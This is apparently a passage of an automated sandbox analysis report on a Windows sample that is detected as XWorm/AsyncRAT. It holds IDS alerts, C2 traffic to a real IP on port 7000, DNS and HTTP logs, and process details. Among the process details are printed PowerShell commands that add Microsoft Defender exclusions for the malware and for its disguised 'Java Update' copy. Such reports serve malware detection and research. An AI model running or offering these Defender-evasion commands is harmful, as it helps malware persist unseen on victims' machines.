2024-12-13T17:46:36.529959+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:41.532108+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:46.538787+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:49.102934+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:51.543235+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:46:56.556107+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:47:00.606699+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:47:00.608558+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49737	45.141.26.234	7000	TCP
2024-12-13T17:47:00.912470+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:47:00.912470+0100	2852874	ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:47:01.565888+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:47:06.575947+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:47:10.734326+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP
2024-12-13T17:47:10.735067+0100	2852923	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)	1	192.168.2.4	49737	45.141.26.234	7000	TCP
2024-12-13T17:47:11.583663+0100	2852870	ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes	1	45.141.26.234	7000	192.168.2.4	49737	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 17:45:02.861910105 CET	49730	80	192.168.2.4	208.95.112.1
Dec 13, 2024 17:45:02.982157946 CET	80	49730	208.95.112.1	192.168.2.4
Dec 13, 2024 17:45:02.982388020 CET	49730	80	192.168.2.4	208.95.112.1
Dec 13, 2024 17:45:02.983549118 CET	49730	80	192.168.2.4	208.95.112.1
Dec 13, 2024 17:45:03.103815079 CET	80	49730	208.95.112.1	192.168.2.4
Dec 13, 2024 17:45:04.237852097 CET	80	49730	208.95.112.1	192.168.2.4
Dec 13, 2024 17:45:04.285733938 CET	49730	80	192.168.2.4	208.95.112.1
Dec 13, 2024 17:45:54.398945093 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:45:54.519217014 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:45:54.519323111 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:45:54.571578979 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:45:54.692105055 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:45:56.562515974 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:45:56.613770962 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:45:56.656049967 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:45:56.776016951 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:45:56.776093006 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:45:56.776123047 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:45:56.776395082 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:45:56.776423931 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:45:56.776456118 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:45:56.776503086 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:00.823486090 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:00.879389048 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:01.474616051 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:01.519995928 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:01.525269032 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:01.653304100 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:01.653341055 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:01.653367996 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:01.662779093 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:01.662930012 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:01.662957907 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:01.727467060 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:06.474256992 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:06.520013094 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:06.529057980 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:06.649169922 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:06.649211884 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:06.649269104 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:06.649296999 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:06.649327040 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:06.649370909 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:06.649398088 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:07.186446905 CET	80	49730	208.95.112.1	192.168.2.4
Dec 13, 2024 17:46:07.186661005 CET	49730	80	192.168.2.4	208.95.112.1
Dec 13, 2024 17:46:07.663515091 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:07.785363913 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:08.743007898 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:08.774353027 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:08.894345045 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:11.491415024 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:11.542471886 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:11.679651022 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:11.804112911 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:11.804162979 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:11.804191113 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:11.804223061 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:11.804249048 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:11.804276943 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:11.804305077 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:11.804335117 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:16.516874075 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:16.562127113 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:16.685142994 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:16.685184956 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:16.685215950 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:16.685225964 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:16.685436010 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:16.685519934 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:16.685530901 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:16.685540915 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:20.755057096 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:20.876276970 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:21.547240973 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:21.548934937 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:21.668780088 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:21.952040911 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:21.995397091 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:22.115590096 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:22.115634918 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:22.115689993 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:22.115719080 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:22.115748882 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:22.115860939 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:22.115894079 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:22.115926981 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:26.671858072 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:26.722189903 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:26.900233030 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:26.900252104 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:26.900264025 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:26.900274992 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:26.900285959 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:26.900298119 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:26.900309086 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:26.900321007 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:30.889530897 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:30.941951036 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:31.532464027 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:31.582568884 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:31.597974062 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:31.718213081 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:31.718393087 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:31.718452930 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:31.718556881 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:31.718617916 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:31.718631983 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:31.718713999 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:31.718732119 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:33.848681927 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:33.968476057 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:34.549061060 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:34.550780058 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:34.674098969 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:36.529958963 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:36.560206890 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:36.680332899 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:36.680351973 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:36.680411100 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:36.680423975 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:36.680485010 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:36.680572033 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:36.680763006 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:36.680775881 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:41.532108068 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:41.578958035 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:41.698899984 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:41.699024916 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:41.699080944 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:41.699160099 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:41.699208975 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:41.699218988 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:41.699263096 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:41.699317932 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:44.255682945 CET	49730	80	192.168.2.4	208.95.112.1
Dec 13, 2024 17:46:44.377290964 CET	80	49730	208.95.112.1	192.168.2.4
Dec 13, 2024 17:46:46.538786888 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:46.574510098 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:46.694473028 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:46.694483995 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:46.694613934 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:46.694622993 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:46.694725990 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:46.694734097 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:46.694845915 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:46.694854021 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:46.942400932 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:47.069042921 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:49.102933884 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:49.104825020 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:49.225116968 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:51.543235064 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:51.573209047 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:51.693938971 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:51.693953991 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:51.693974972 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:51.693988085 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:51.694000006 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:51.694015026 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:51.694026947 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:51.694048882 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:56.556107044 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:56.598248005 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:56.613318920 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:46:56.733493090 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:56.733511925 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:56.733535051 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:56.733556986 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:56.733571053 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:56.733582973 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:56.733607054 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:46:56.733620882 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:00.036222935 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:47:00.157912016 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:00.606698990 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:00.608557940 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:47:00.728514910 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:00.912470102 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:00.957612991 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:47:01.565887928 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:01.615662098 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:47:01.623670101 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:47:01.743710041 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:01.743736029 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:01.743823051 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:01.743885040 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:01.744083881 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:01.744131088 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:01.744246006 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:01.744267941 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:06.575947046 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:06.629517078 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:47:10.161292076 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:47:10.214250088 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:47:10.285505056 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:10.338706970 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:10.338785887 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:10.338915110 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:10.338943005 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:10.338994026 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:10.339020967 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:10.339054108 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:10.339102983 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:10.734325886 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:10.735066891 CET	49737	7000	192.168.2.4	45.141.26.234
Dec 13, 2024 17:47:10.855590105 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:11.583662987 CET	7000	49737	45.141.26.234	192.168.2.4
Dec 13, 2024 17:47:11.629503965 CET	49737	7000	192.168.2.4	45.141.26.234

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 17:45:02.709244013 CET	49315	53	192.168.2.4	1.1.1.1
Dec 13, 2024 17:45:02.854425907 CET	53	49315	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 13, 2024 17:45:02.709244013 CET	192.168.2.4	1.1.1.1	0x33d0	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 13, 2024 17:45:02.854425907 CET	1.1.1.1	192.168.2.4	0x33d0	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	208.95.112.1	80	7316	C:\Users\user\Desktop\03VPFXH490.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 17:45:02.983549118 CET	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Dec 13, 2024 17:45:04.237852097 CET	175	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:45:03 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Target ID:	0
Start time:	11:44:58
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\03VPFXH490.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\03VPFXH490.exe"
Imagebase:	0xa50000
File size:	41'472 bytes
MD5 hash:	F9A6811D7A9D5E06D73A68FC729CE66C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000000.1675093210.0000000000A52000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1675093210.0000000000A52000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1675093210.0000000000A52000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2941379266.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2941379266.0000000002E8A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	11:45:03
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\03VPFXH490.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:45:03
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	11:45:09
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '03VPFXH490.exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	11:45:09
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	11:45:19
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:45:19
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:45:34
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:45:34
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	23.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	20%
Total number of Nodes:	15
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9BAD0610 Relevance: 2.0, Strings: 1, Instructions: 762
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

CAL_^, xrefs: 00007FFD9BAD0FFD

Memory Dump Source

Source File: 00000000.00000002.2987103485.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bad0000_03VPFXH490.jbxd

Similarity

API ID:
String ID: CAL_^
API String ID: 0-3140518731
Opcode ID: 1db74a51ec65c1ee742836f50f499ae3949341a6a264e1592e16540c21d6c89c
Instruction ID: 6e7f34d79564c40ee3d1ad4172b1ec2070a673b369f666fe9fbc64a5bfe5cd08
Opcode Fuzzy Hash: 1db74a51ec65c1ee742836f50f499ae3949341a6a264e1592e16540c21d6c89c
Instruction Fuzzy Hash: A5323421B19A490FE7A8FB7888796B977D2FFD8314F40467DE04EC32D6DE28A8418741

Function 00007FFD9BAD6E61 Relevance: 1.6, APIs: 1, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32 ref: 00007FFD9BAD6F10

Memory Dump Source

